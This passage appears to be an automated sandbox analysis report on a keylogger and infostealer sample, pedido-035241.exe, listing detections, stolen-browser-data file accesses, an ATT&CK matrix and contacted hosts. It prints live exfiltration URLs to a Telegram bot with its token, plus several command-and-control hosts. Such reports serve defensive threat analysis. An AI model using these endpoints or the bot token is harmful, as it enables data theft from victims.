            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\pedido-035241.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7

            Stealing of Sensitive Information

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 00000006.00000002.2981297005.00000000243D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Yara detected Telegram RAT
            Source: Yara matchFile source: 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 8000, type: MEMORYSTR
            Yara detected VIP Keylogger
            Source: Yara matchFile source: 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: Yara matchFile source: 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 8000, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 00000006.00000002.2981297005.00000000243D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Yara detected Telegram RAT
            Source: Yara matchFile source: 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 8000, type: MEMORYSTR
            Yara detected VIP Keylogger
            Source: Yara matchFile source: 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		2
            Obfuscated Files or Information            		1
            OS Credential Dumping            		2
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		1
            Web Service            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            PowerShell            		1
            Registry Run Keys / Startup Folder            		1
            Access Token Manipulation            		1
            Software Packing            		LSASS Memory14
            System Information Discovery            		Remote Desktop Protocol1
            Data from Local System            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
            Process Injection            		1
            DLL Side-Loading            		Security Account Manager11
            Security Software Discovery            		SMB/Windows Admin Shares1
            Email Collection            		11
            Encrypted Channel            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            Registry Run Keys / Startup Folder            		11
            Masquerading            		NTDS1
            Process Discovery            		Distributed Component Object Model1
            Clipboard Data            		4
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script31
            Virtualization/Sandbox Evasion            		LSA Secrets31
            Virtualization/Sandbox Evasion            		SSHKeylogging15
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Access Token Manipulation            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
            Process Injection            		DCSync1
            System Network Configuration Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576204 Sample: pedido-035241.exe Startdate: 16/12/2024 Architecture: WINDOWS Score: 100 34 reallyfreegeoip.org 2->34 36 api.telegram.org 2->36 38 4 other IPs or domains 2->38 44 Found malware configuration 2->44 46 Yara detected VIP Keylogger 2->46 48 Yara detected GuLoader 2->48 54 4 other signatures 2->54 8 pedido-035241.exe 1 33 2->8         started        signatures3 50 Tries to detect the country of the analysis system (by using the IP) 34->50 52 Uses the Telegram API (likely for C&C communication) 36->52 process4 file5 22 C:\Users\user\AppData\Local\...\takelma.Uns, Unicode 8->22 dropped 24 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->24 dropped 56 Suspicious powershell command line found 8->56 12 powershell.exe 30 8->12         started        signatures6 process7 file8 26 C:\Users\user\AppData\...\pedido-035241.exe, PE32 12->26 dropped 58 Early bird code injection technique detected 12->58 60 Writes to foreign memory regions 12->60 62 Found suspicious powershell code related to unpacking or dynamic code loading 12->62 64 3 other signatures 12->64 16 msiexec.exe 15 8 12->16         started        20 conhost.exe 12->20         started        signatures9 process10 dnsIp11 28 api.telegram.org 149.154.167.220, 443, 49880, 49901 TELEGRAMRU United Kingdom 16->28 30 158.101.44.242, 49828, 49835, 49842 ORACLE-BMC-31898US United States 16->30 32 4 other IPs or domains 16->32 40 Tries to steal Mail credentials (via file / registry access) 16->40 42 Tries to harvest and steal browser information (history, passwords, etc) 16->42 signatures12

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            pedido-035241.exe5%ReversingLabs

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Flyvevaabnene\pedido-035241.exe5%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nso7E83.tmp\nsExec.dll0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            		172.217.19.174
            		truefalse
              		high
              drive.usercontent.google.com
              		142.250.181.97
              		truefalse
                		high
                reallyfreegeoip.org
                		104.21.67.152
                		truefalse
                  		high
                  api.telegram.org
                  		149.154.167.220
                  		truefalse
                    		high
                    checkip.dyndns.com
                    		193.122.6.168
                    		truefalse
                      		high
                      checkip.dyndns.org
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://reallyfreegeoip.org/xml/8.46.123.189false
                          		high
                          https://api.telegram.org/bot7268913379:AAGd-tQ4vpps-mce2n9ECDznKp3DeHYACWw/sendDocument?chat_id=7763958191&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recoveryfalse
                            		high
                            http://checkip.dyndns.org/false
                              		high
                              https://api.telegram.org/bot7268913379:AAGd-tQ4vpps-mce2n9ECDznKp3DeHYACWw/sendDocument?chat_id=7763958191&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recoveryfalse
                                		high
                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:745773%0D%0ADate%20and%20Time:%2017/12/2024%20/%2018:38:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20745773%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://www.office.com/msiexec.exe, 00000006.00000002.2981297005.00000000245C3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.00000000245B4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/chrome_newtabmsiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/ac/?q=msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://api.telegram.orgmsiexec.exe, 00000006.00000002.2981297005.0000000024575000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.00000000244B5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icomsiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://api.telegram.org/botmsiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://translate.google.com/translate_a/element.jsmsiexec.exe, 00000006.00000003.2471471790.000000000894B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2471471790.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2471549255.0000000008957000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.office.com/lBmsiexec.exe, 00000006.00000002.2981297005.00000000245BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://drive.usercontent.google.com/msiexec.exe, 00000006.00000003.2530503003.0000000008952000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2967421092.0000000008939000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2528720464.0000000008957000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://checkip.dyndns.orgmsiexec.exe, 00000006.00000002.2981297005.00000000243D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.000000002551E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.000000002564D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.00000000254F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.0000000025750000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.00000000254A9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://nsis.sf.net/NSIS_ErrorErrorpedido-035241.exe, pedido-035241.exe.1.drfalse
                                                              		high
                                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.000000002551E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.000000002564D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.00000000254F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.0000000025750000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.00000000254A9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://api.telegram.org/bot/sendMessage?chat_id=&text=msiexec.exe, 00000006.00000002.2981297005.00000000244B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://chrome.google.com/webstore?hl=enmsiexec.exe, 00000006.00000002.2981297005.0000000024592000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.ecosia.org/newtab/msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:745773%0D%0ADate%20amsiexec.exe, 00000006.00000002.2981297005.00000000244B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://varders.kozow.com:8081msiexec.exe, 00000006.00000002.2981297005.00000000243D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://aborters.duckdns.org:8081msiexec.exe, 00000006.00000002.2981297005.00000000243D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://ac.ecosia.org/autocomplete?q=msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.google.commsiexec.exe, 00000006.00000003.2471471790.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2528720464.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2471549255.0000000008957000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://51.38.247.67:8081/_send_.php?Lmsiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://drive.google.com/msiexec.exe, 00000006.00000002.2967421092.00000000088DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://anotherarmy.dns.army:8081msiexec.exe, 00000006.00000002.2981297005.00000000243D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://api.telegram.org/bot7268913379:AAGd-tQ4vpps-mce2n9ECDznKp3DeHYACWw/sendDocument?chat_id=7763msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installmsiexec.exe, 00000006.00000002.2982840463.0000000025484000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.000000002572B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.0000000025655000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.0000000025628000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.00000000254F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.00000000254B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmsiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://chrome.google.com/webstore?hl=enlBmsiexec.exe, 00000006.00000002.2981297005.000000002458D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://reallyfreegeoip.org/xml/8.46.123.189$msiexec.exe, 00000006.00000002.2981297005.00000000244B5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.000000002448E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.0000000024448000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://reallyfreegeoip.orgmsiexec.exe, 00000006.00000002.2981297005.00000000244B5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.000000002448E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.000000002441E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://apis.google.commsiexec.exe, 00000006.00000003.2471471790.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2528720464.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2471549255.0000000008957000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesmsiexec.exe, 00000006.00000002.2982840463.0000000025484000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.000000002572B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.0000000025655000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.0000000025628000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.00000000254F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.00000000254B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://api.telegram.orgmsiexec.exe, 00000006.00000002.2981297005.0000000024575000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namemsiexec.exe, 00000006.00000002.2981297005.00000000243D1000.00000004.00000800.00020000.00000000.sdmpfalse
